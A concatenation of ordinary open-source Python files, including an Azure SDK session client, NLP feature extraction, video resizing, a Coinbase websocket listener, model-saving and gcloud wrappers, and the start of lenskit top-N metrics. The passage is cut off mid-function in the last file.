sdk/servermanager/azure-mgmt-servermanager/azure/mgmt/servermanager/operations/session_operations.py | rsdoherty/azure-sdk-for-python | 2,728 | 12690438 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class SessionOperations(object):
"""SessionOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API Version. Constant value: "2016-07-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2016-07-01-preview"
self.config = config
def _create_initial(
self, resource_group_name, node_name, session, user_name=None, password=<PASSWORD>, retention_period=None, credential_data_format=None, encryption_certificate_thumbprint=None, custom_headers=None, raw=False, **operation_config):
session_parameters = models.SessionParameters(user_name=user_name, password=password, retention_period=retention_period, credential_data_format=credential_data_format, encryption_certificate_thumbprint=encryption_certificate_thumbprint)
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(session_parameters, 'SessionParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SessionResource', response)
if response.status_code == 201:
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, node_name, session, user_name=None, password=<PASSWORD>, retention_period=None, credential_data_format=None, encryption_certificate_thumbprint=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param user_name: Encrypted User name to be used to connect to node.
:type user_name: str
:param password: Encrypted Password associated with user name.
:type password: str
:param retention_period: Session retention period. Possible values
include: 'Session', 'Persistent'
:type retention_period: str or
~azure.mgmt.servermanager.models.RetentionPeriod
:param credential_data_format: Credential data format. Possible values
include: 'RsaEncrypted'
:type credential_data_format: str or
~azure.mgmt.servermanager.models.CredentialDataFormat
:param encryption_certificate_thumbprint: Encryption certificate
thumbprint.
:type encryption_certificate_thumbprint: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns SessionResource or
ClientRawResponse<SessionResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.servermanager.models.SessionResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.servermanager.models.SessionResource]]
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
raw_result = self._create_initial(
resource_group_name=resource_group_name,
node_name=node_name,
session=session,
user_name=user_name,
password=password,
retention_period=retention_period,
credential_data_format=credential_data_format,
encryption_certificate_thumbprint=encryption_certificate_thumbprint,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
def delete(
self, resource_group_name, node_name, session, custom_headers=None, raw=False, **operation_config):
"""Deletes a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
def get(
self, resource_group_name, node_name, session, custom_headers=None, raw=False, **operation_config):
"""Gets a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SessionResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.servermanager.models.SessionResource or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
|
mmpose/datasets/datasets/fashion/__init__.py | jlgzb/mmpose | 367 | 12690454 | <reponame>jlgzb/mmpose
from .deepfashion_dataset import DeepFashionDataset
__all__ = ['DeepFashionDataset']
|
armi/cli/cleanTemps.py | keckler/armi | 162 | 12690466 | # Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from armi import context
from armi.cli.entryPoint import EntryPoint
class CleanTemps(EntryPoint):
"""
Delete all temp directories created by any ARMI run.
Useful for occasionally cleaning temporary dirs from crashed runs.
.. warning:: This will break any ongoing runs.
"""
name = "clean-temps"
def invoke(self):
context.cleanTempDirs(olderThanDays=0)
|
model_zoo/evaluater.py | ModelZoo/ModelZoo | 191 | 12690476 | from model_zoo.logger import get_logger
from model_zoo.utils import load_config, load_model, find_model_class
from absl import flags
# ========== Checkpoint ================
flags.DEFINE_string('checkpoint_dir', 'checkpoints', help='Data source dir', allow_override=True)
flags.DEFINE_string('checkpoint_name', 'model.ckpt', help='Model name', allow_override=True)
# ========== Log System ================
flags.DEFINE_bool('log_enable', True, help='Whether to enable Log System', allow_override=True)
flags.DEFINE_string('log_level', 'DEBUG', help='Log Level', allow_override=True)
flags.DEFINE_string('log_rotation', '100MB', help='Log file rotation', allow_override=True)
flags.DEFINE_string('log_retention', None, help='Log file retention', allow_override=True)
flags.DEFINE_string('log_format', '{time} - {level} - {module} - {file} - {message}', help='Log record format',
allow_override=True)
flags.DEFINE_string('log_folder', './logs/', help='Folder of log file', allow_override=True)
flags.DEFINE_string('log_file', 'evaluate.log', help='Name of log file', allow_override=True)
flags.DEFINE_string('log_path', '', help='File path of log file', allow_override=True)
class BaseEvaluater(object):
"""
Base Evaluater, you need to specify
"""
def __init__(self):
"""
you need to define model_class in your Inferer
"""
self.config = flags.FLAGS.flag_values_dict()
# get logger
logger = get_logger(self.config)
self.logger = logger
def data(self):
"""
you need to implement this method
:return:
"""
raise NotImplementedError
def run(self, **kwargs):
"""
start inferring
:return:
"""
# prepare data
self.eval_data = self.data()
# split data
x_eval, y_eval = self.eval_data
# init configs from checkpoints json file and flags
config = load_config(self.config)
# init model class
model_class_name, model_file_name = config.get('model_class_name'), config.get('model_file_name')
self.model_class = find_model_class(model_class_name, model_file_name)
# init model
model = self.model_class(config=config)
model.logger = self.logger
self.logger.info(f'initialize model logger {model.logger} of {model}')
# restore model
load_model(model, self.config.get('checkpoint_dir'), self.config.get('checkpoint_name'))
# evaluate
return model.evaluate(x_eval, y_eval, **kwargs)
|
features.py | Umesh-01/NavigateMe | 145 | 12690508 | # pass in a sentence, pass out it's features
import nltk
import pandas as pd
import sys
import hashlib
import re
import string
import itertools
from nltk import word_tokenize
from nltk.corpus import stopwords
import logging
import logger_config
log = logging.getLogger(__name__)
log.info("Entered module: %s" % __name__)
lemma = nltk.wordnet.WordNetLemmatizer()
sno = nltk.stem.SnowballStemmer("english")
line = [
"xxx",
"Oracle 12.2 will be released for on-premises users on 15 March 2017",
0,
"S",
]
pos = [] # list of PartsOfSpeech
output = "" # comma separated string
header = "" # string for describing features header
VerbCombos = ["VB", "VBD", "VBG", "VBN", "VBP", "VBZ", "WDT", "WP", "WP$", "WRB", "MD"]
questionTriples = [
"CD-VB-VBN",
"MD-PRP-VB",
"MD-VB-CD",
"NN-IN-DT",
"PRP-VB-PRP",
"PRP-WP-NNP",
"VB-CD-VB",
"VB-PRP-WP",
"VBZ-DT-NN",
"WP-VBZ-DT",
"WP-VBZ-NNP",
"WRB-MD-VB",
]
statementTriples = [
"DT-JJ-NN",
"DT-NN-VBZ",
"DT-NNP-NNP",
"IN-DT-NN",
"IN-NN-NNS",
"MD-VB-VBN",
"NNP-IN-NNP",
"NNP-NNP-NNP",
"NNP-VBZ-DT",
"NNP-VBZ-NNP",
"NNS-IN-DT",
"VB-VBN-IN",
"VBZ-DT-JJ",
]
startTuples = ["NNS-DT", "WP-VBZ", "WRB-MD"]
endTuples = ["IN-NN", "VB-VBN", "VBZ-NNP"]
"""Because python dict's return key-vals in random order, provide ordered
list to pass to ML models"""
feature_keys = [
"id",
"wordCount",
"stemmedCount",
"stemmedEndNN",
"CD",
"NN",
"NNP",
"NNPS",
"NNS",
"PRP",
"VBG",
"VBZ",
"startTuple0",
"endTuple0",
"endTuple1",
"endTuple2",
"verbBeforeNoun",
"qMark",
"qVerbCombo",
"qTripleScore",
"sTripleScore",
"class",
]
@logger_config.logger
def strip_sentence(sentence):
sentence = sentence.strip(",")
sentence = "".join(filter(lambda x: x in string.printable, sentence))
# strip out non-alpha-numerix
sentence = sentence.translate(str.maketrans("", "", string.punctuation))
# strip punctuation
return sentence
@logger_config.logger
def exists_pair_combos(comboCheckList, sentence):
pos = get_pos(sentence)
tag_string = "-".join([i[1] for i in pos])
combo_list = []
for pair in itertools.permutations(comboCheckList, 2):
if pair[0] == "MD": # Kludge - strip off leading MD
pair = ["", ""]
combo_list.append("-".join(pair))
if any(code in tag_string for code in combo_list):
return 1
else:
return 0
@logger_config.logger
# Parts Of Speech
def get_pos(sentence):
sentenceParsed = word_tokenize(sentence)
return nltk.pos_tag(sentenceParsed)
@logger_config.logger
# Count Q-Marks
def count_qmark(sentence):
return sentence.count("?")
@logger_config.logger
# Count a specific POS-Type
# VBG = count_POSType(pos,'VBG')
def count_POSType(pos, ptype):
tags = [i[1] for i in pos]
return tags.count(ptype)
# if ptype in tags:
# VBG = 1
# return(VBG)
@logger_config.logger
# Does Verb occur before first Noun
def exists_vb_before_nn(pos):
pos_tags = [i[1] for i in pos]
# Strip the Verbs to all just "V"
pos_tags = [re.sub(r"V.*", "V", str) for str in pos_tags]
# Strip the Nouns to all just "NN"
pos_tags = [re.sub(r"NN.*", "NN", str) for str in pos_tags]
vi = 99
ni = 99
mi = 99
# Get first NN index
if "NN" in pos_tags:
ni = pos_tags.index("NN")
# Get first V index
if "V" in pos_tags:
vi = pos_tags.index("V")
# get Modal Index
if "MD" in pos_tags:
mi = pos_tags.index("MD")
if vi < ni or mi < ni:
return 1
else:
return 0
@logger_config.logger
# Stemmed sentence ends in "NN-NN"?
def exists_stemmed_end_NN(stemmed):
stemmedEndNN = 0
stemmed_end = get_first_last_tuples(" ".join(stemmed))[1]
if stemmed_end == "NN-NN":
stemmedEndNN = 1
return stemmedEndNN
@logger_config.logger
# Go through the predefined list of start-tuples, 1 / 0 if given startTuple occurs in the list
def exists_startTuple(startTuple):
exists_startTuples = []
for tstring in startTuples: # startTuples defined as global var
if startTuple in tstring:
exists_startTuples.append(1)
else:
exists_startTuples.append(0)
return exists_startTuples
@logger_config.logger
# Go through the predefined list of end-tuples, 1 / 0 if given Tuple occurs in the list
def exists_endTuple(endTuple):
exists_endTuples = []
for tstring in endTuples: # endTuples defined as global var
if endTuple in tstring:
exists_endTuples.append(1)
else:
exists_endTuples.append(0)
return exists_endTuples
@logger_config.logger
# loop round list of triples and construct a list of binary 1/0 vals if triples occur in list
def exists_triples(triples, tripleSet):
exists = []
for tstring in tripleSet:
if tstring in triples:
exists.append(1)
else:
exists.append(0)
return exists
@logger_config.logger
# Get a sentence and spit out the POS triples
def get_triples(pos):
list_of_triple_strings = []
pos = [i[1] for i in pos] # extract the 2nd element of the POS tuples in list
n = len(pos)
if n > 2: # need to have three items
for i in range(0, n - 2):
t = "-".join(
pos[i : i + 3] # noqa: E203
) # pull out 3 list item from counter, convert to string
list_of_triple_strings.append(t)
return list_of_triple_strings
@logger_config.logger
def get_first_last_tuples(sentence):
first_last_tuples = []
sentenceParsed = word_tokenize(sentence)
pos = nltk.pos_tag(sentenceParsed) # Parts Of Speech
pos = [i[1] for i in pos] # extract the 2nd element of the POS tuples in list
n = len(pos)
first = ""
last = ""
if n > 1: # need to have three items
first = "-".join(pos[0:2]) # pull out first 2 list items
last = "-".join(pos[-2:]) # pull out last 2 list items
first_last_tuples = [first, last]
return first_last_tuples
@logger_config.logger
def lemmatize(sentence):
"""
pass in a sentence as a string, return just core text that has
been "lematised" stop words are removed - could effect ability to detect if
this is a question or answer - depends on import
lemma = nltk.wordnet.WordNetLemmatizer()
and from nltk.corpus import stopwords
"""
stop_words = set(stopwords.words("english"))
word_tokens = word_tokenize(sentence)
filtered_sentence = []
for w in word_tokens:
if w not in stop_words:
filtered_sentence.append(w.lower()) # also set lowercase
lem = []
for w in filtered_sentence:
lem.append(lemma.lemmatize(w))
return lem
@logger_config.logger
def stematize(sentence):
"""
pass in a sentence as a string, return just core text stemmed
stop words are removed - could effect ability to detect if this is a
question or answer - depends on import
sno = nltk.stem.SnowballStemmer('english')
and from nltk.corpus import stopwords
"""
stop_words = set(stopwords.words("english"))
word_tokens = word_tokenize(sentence)
filtered_sentence = []
for w in word_tokens:
if w not in stop_words:
filtered_sentence.append(w)
stemmed = []
for w in filtered_sentence:
stemmed.append(sno.stem(w))
return stemmed
#########################################################################
# A wrapper function to put it all together - build a csv line to return
# A header string is also returned for optional use
def get_string(id, sentence, c="X"):
header, output = "", ""
pos = get_pos(sentence)
qMark = count_qmark(sentence) # count Qmarks before stripping punctuation
sentence = strip_sentence(sentence)
# lemmed = lemmatize(sentence)
stemmed = stematize(sentence)
wordCount = len(sentence.split())
stemmedCount = len(stemmed)
qVerbCombo = exists_pair_combos(VerbCombos, sentence)
verbBeforeNoun = exists_vb_before_nn(pos)
output = (
id
+ ","
+ str(wordCount)
+ ","
+ str(stemmedCount)
+ ","
+ str(qVerbCombo)
+ ","
+ str(qMark)
+ ","
+ str(verbBeforeNoun)
)
header = header + "id,wordCount,stemmedCount,qVerbCombo,qMark,verbBeforeNoun"
# list of POS-TYPES to count , generate a list of counts in the CSV line
for ptype in ["VBG", "VBZ", "NNP", "NN", "NNS", "NNPS", "PRP", "CD"]:
output = output + "," + str(count_POSType(pos, ptype))
header = header + "," + ptype
output = output + "," + str(exists_stemmed_end_NN(stemmed))
header = header + ",StemmedEndNN,"
# get Start Tuples and End Tuples Features ##
startTuple, endTuple = get_first_last_tuples(sentence)
list1 = exists_startTuple(startTuple) # list [1/0] for exists / not exists
output = output + "," + ",".join(str(i) for i in list1)
for i in range(0, len(list1)):
header = header + "startTuple" + str(i + 1) + ","
list1 = exists_endTuple(endTuple) # list [1/0] for exists / not exists
output = output + "," + ",".join(str(i) for i in list1)
for i in range(0, len(list1)):
header = header + "endTuple" + str(i + 1) + ","
# look for special Triple Combinations ##
triples = get_triples(pos) # all the triple sequences in the sentence POS list
list1 = exists_triples(triples, questionTriples)
total = sum(list1)
output = output + "," + str(total)
header = header + "qTripleScore" + ","
list1 = exists_triples(triples, statementTriples)
total = sum(list1)
output = output + "," + str(total)
header = header + "sTripleScore" + ","
output = output + "," + c # Class Type on end
header = header + "class"
return output, header
# End of Get String wrapper
@logger_config.logger
# Build a dictionary of features
def features_dict(id, sentence, c="X"):
features = {}
pos = get_pos(sentence)
features["id"] = id
features["qMark"] = count_qmark(
sentence
) # count Qmarks before stripping punctuation
sentence = strip_sentence(sentence)
stemmed = stematize(sentence)
startTuple, endTuple = get_first_last_tuples(sentence)
features["wordCount"] = len(sentence.split())
features["stemmedCount"] = len(stemmed)
features["qVerbCombo"] = exists_pair_combos(VerbCombos, sentence)
features["verbBeforeNoun"] = exists_vb_before_nn(pos)
for ptype in ["VBG", "VBZ", "NNP", "NN", "NNS", "NNPS", "PRP", "CD"]:
features[ptype] = count_POSType(pos, ptype)
features["stemmedEndNN"] = exists_stemmed_end_NN(stemmed)
list1 = exists_startTuple(startTuple) # list [1/0] for exists / not exists
for i in range(0, len(list1)):
features["startTuple" + str(i)] = list1[i]
list1 = exists_endTuple(endTuple) # list [1/0] for exists / not exists
for i in range(0, len(list1)):
features["endTuple" + str(i)] = list1[i]
# look for special Triple Combinations ##
triples = get_triples(pos) # all the triple sequences in the sentence POS list
list1 = exists_triples(
triples, questionTriples
) # a list of 1/0 for hits on this triple-set
features["qTripleScore"] = sum(
list1
) # add all the triple matches up to get a score
list1 = exists_triples(
triples, statementTriples
) # Do same check for the Statement t-set
features["sTripleScore"] = sum(
list1
) # add all the triple matches up to get a score
features["class"] = c # Class Type on end
return features
@logger_config.logger
# pass in dict, get back series
def features_series(features_dict):
values = []
for key in feature_keys:
values.append(features_dict[key])
features_series = pd.Series(values)
return features_series
# MAIN ##
if __name__ == "__main__":
"""ID, WordCount, StemmedCount, Qmark, VBG, StemmedEnd, StartTuples,
EndTuples, QuestionTriples, StatementTriples, Class
[1/0] [NN-NN?] [3 x binary] [3 x binary] [10 x binary] [10 x binary]"""
logging.debug("Starting...")
c = "X" # Dummy class
header = ""
output = ""
if len(sys.argv) > 1:
sentence = sys.argv[1]
else:
sentence = line[1]
id = hashlib.md5(str(sentence).encode("utf-8")).hexdigest()[:16]
features = features_dict(id, sentence, c)
pos = get_pos(sentence) # NLTK Parts Of Speech, duplicated just for the printout
logging.debug(pos)
logging.debug(features)
for key, value in features.items():
logging.debug(key, value)
# header string
for key, value in features.items():
header = header + ", " + key # keys come out in a random order
output = output + ", " + str(value)
header = header[1:] # strip the first ","" off
output = output[1:] # strip the first ","" off
logging.debug("HEADER:", header)
logging.debug("VALUES:", output)
|
example_video_smart_resize.py | viddik13/katna | 125 | 12690523 | <filename>example_video_smart_resize.py
import os
import os.path
import cv2
from Katna.video import Video
import multiprocessing
import Katna.config as app_config
# change these paths
# usually autoflip build is located here : /mediapipe/repo/bazel-build/mediapipe/examples/desktop/autoflip
# usually mediapipe model is located here : /mediapipe/repo/mediapipe/models
autoflip_build_path = "/path/to/autoflip/build"
autoflip_model_path = "/path/to/mediapipe/models"
# output aspect ratio
aspect_ratio = "9:16"
# get the current configuration
conf = app_config.MediaPipe.AutoFlip.get_conf()
# set True for features which are required in output
conf["ENFORCE_FEATURES"] = {
"FACE_CORE_LANDMARKS": False,
"FACE_ALL_LANDMARKS": False,
"FACE_FULL": False,
"HUMAN": False,
"PET": False,
"CAR": False,
"OBJECT": False
}
# % stabalization threshold
conf["STABALIZATION_THRESHOLD"] = 0.5
# opacity of blur area
conf["BLUR_AREA_OPACITY"] = 0.6
def main_folder():
dir_path = file_path = os.path.join(".", "tests", "data")
# will create a resize_result dir inside data folder and dump videos there
abs_dir_path_output = os.path.join(".", "tests", "data", "resize_results")
vd = Video(autoflip_build_path, autoflip_model_path)
# update configuration
app_config.MediaPipe.AutoFlip.set_conf(conf)
try:
vd.resize_video_from_dir(dir_path = dir_path, abs_dir_path_output = abs_dir_path_output, aspect_ratio = aspect_ratio)
except Exception as e:
raise e
print(f"output resized video dir path = {abs_dir_path_output}")
def main_single_video():
# resize the pos_video.mp4 in same directory with na,e pos_video_resize.mp4
abs_file_path_output = os.path.join(".", "tests", "data", "pos_video_resize.mp4")
file_path = os.path.join(".", "tests", "data", "pos_video.mp4")
vd = Video(autoflip_build_path, autoflip_model_path)
# update configuration
app_config.MediaPipe.AutoFlip.set_conf(conf)
try:
vd.resize_video(file_path = file_path, abs_file_path_output = abs_file_path_output, aspect_ratio = aspect_ratio)
except Exception as e:
raise e
print(f"output resized video file path = {abs_file_path_output}")
if __name__ == "__main__":
main_single_video()
# uncomment this to run on a folder
# main_folder()
|
script-coinbasepro-webhooks.py | Joel-max-s/pycryptobot | 1,447 | 12690530 | import json, time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
def main():
ws = None
thread = None
thread_running = False
thread_keepalive = None
def websocket_thread():
global ws
ws = create_connection("wss://ws-feed.pro.coinbase.com")
ws.send(
json.dumps(
{
"type": "subscribe",
"product_ids": ['BTC-USD'],
"channels": ["matches"],
}
)
)
thread_keepalive.start()
while not thread_running:
try:
data = ws.recv()
if data != "":
msg = json.loads(data)
else:
msg = {}
except ValueError as e:
print(e)
print("{} - data: {}".format(e, data))
except Exception as e:
print(e)
print("{} - data: {}".format(e, data))
else:
if "result" not in msg:
print(msg)
try:
if ws:
ws.close()
except WebSocketConnectionClosedException:
pass
finally:
thread_keepalive.join()
def websocket_keepalive(interval=30):
global ws
while ws.connected:
ws.ping("keepalive")
time.sleep(interval)
thread = Thread(target=websocket_thread)
thread_keepalive = Thread(target=websocket_keepalive)
thread.start()
if __name__ == "__main__":
main()
|
finetuning/v2/save-model.py | wietsedv/bertje | 104 | 12690536 | import os
import sys
from transformers import ModelCard, AutoTokenizer, BertForTokenClassification, BertForSequenceClassification, TokenClassificationPipeline, TextClassificationPipeline
if len(sys.argv) < 4:
print('usage: "python save-model.py basename name type task" where "basename" is the original model name ("bert-base-dutch-cased"), "name" is the dir name in "output" and type is "token" or "seq"')
exit(1)
base_name = sys.argv[1]
name = sys.argv[2]
typ = sys.argv[3]
if typ not in ['token', 'seq']:
print('type must be token or seq')
exit(1)
src_path = os.path.join('output', name, 'model')
if not os.path.exists(src_path):
print(src_path + ' does not exist')
exit(1)
name = base_name + '-finetuned-' + '-'.join(name.split('-')[:-1])
print(name)
dst_path = f'models/{name}'
os.makedirs(dst_path, exist_ok=True)
# Load model
model = BertForTokenClassification.from_pretrained(
src_path) if typ == 'token' else BertForSequenceClassification.from_pretrained(src_path)
tokenizer = AutoTokenizer.from_pretrained(base_name)
modelcard = ModelCard(model_details="""This model does not have a specific model card yet.
You can possibly find more information about model comparison and labels at [the Github page](https://github.com/wietsedv/bertje).""")
# Save pipeline
pipeline = TokenClassificationPipeline if typ == 'token' else TextClassificationPipeline
pipe = pipeline(model, tokenizer, modelcard=modelcard)
pipe.save_pretrained(dst_path)
|
env/Lib/site-packages/OpenGL/GL/ARB/conditional_render_inverted.py | 5gconnectedbike/Navio2 | 210 | 12690539 | '''OpenGL extension ARB.conditional_render_inverted
This module customises the behaviour of the
OpenGL.raw.GL.ARB.conditional_render_inverted to provide a more
Python-friendly API
Overview (from the spec)
This extension adds new modes to BeginConditionalRender which invert
the condition used to determine whether to draw or not.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/conditional_render_inverted.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.conditional_render_inverted import *
from OpenGL.raw.GL.ARB.conditional_render_inverted import _EXTENSION_NAME
def glInitConditionalRenderInvertedARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
ansible/roles/lib_gcloud/build/src/gcloud_compute_zones.py | fahlmant/openshift-tools | 164 | 12690542 | # pylint: skip-file
# pylint: disable=too-many-instance-attributes
class GcloudComputeZones(GcloudCLI):
''' Class to wrap the gcloud compute zones command'''
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self, region=None, verbose=False):
''' Constructor for gcloud resource '''
super(GcloudComputeZones, self).__init__()
self._region = region
self.verbose = verbose
@property
def region(self):
'''property for region'''
return self._region
def list_zones(self):
'''return a list of zones'''
results = self._list_zones()
if results['returncode'] == 0 and self.region:
zones = []
for zone in results['results']:
if self.region == zone['region']:
zones.append(zone)
results['results'] = zones
return results
|
lenskit/metrics/topn.py | keener101/lkpy | 210 | 12690572 | <reponame>keener101/lkpy<filename>lenskit/metrics/topn.py
"""
Top-N evaluation metrics.
"""
import logging
import numpy as np
import pandas as pd
_log = logging.getLogger(__name__)
def bulk_impl(metric):
def wrap(impl):
metric.bulk_score = impl
return impl
return wrap
def precision(recs, truth, k=None):
"""
Compute recommendation precision. This is computed as:
.. math::
\\frac{|L \\cap I_u^{\\mathrm{test}}|}{|L|}
In the uncommon case that ``k`` is specified and ``len(recs) < k``, this metric uses
``len(recs)`` as the denominator.
"""
if k is not None:
recs = recs.iloc[:k]
nrecs = len(recs)
if nrecs == 0:
return None
ngood = recs['item'].isin(truth.index).sum()
return ngood / nrecs
@bulk_impl(precision)
def _bulk_precision(recs, truth, k=None):
if k is not None:
recs = recs[recs['rank'] <= k]
lcounts = pd.Series(k, index=recs['LKRecID'].unique())
lcounts.index.name = 'LKRecID'
else:
lcounts = recs.groupby(['LKRecID'])['item'].count()
good = recs.join(truth, on=['LKTruthID', 'item'], how='inner')
gcounts = good.groupby(['LKRecID'])['item'].count()
lcounts, gcounts = lcounts.align(gcounts, join='left', fill_value=0)
return gcounts / lcounts
def recall(recs, truth, k=None):
"""
Compute recommendation recall.
"""
nrel = len(truth)
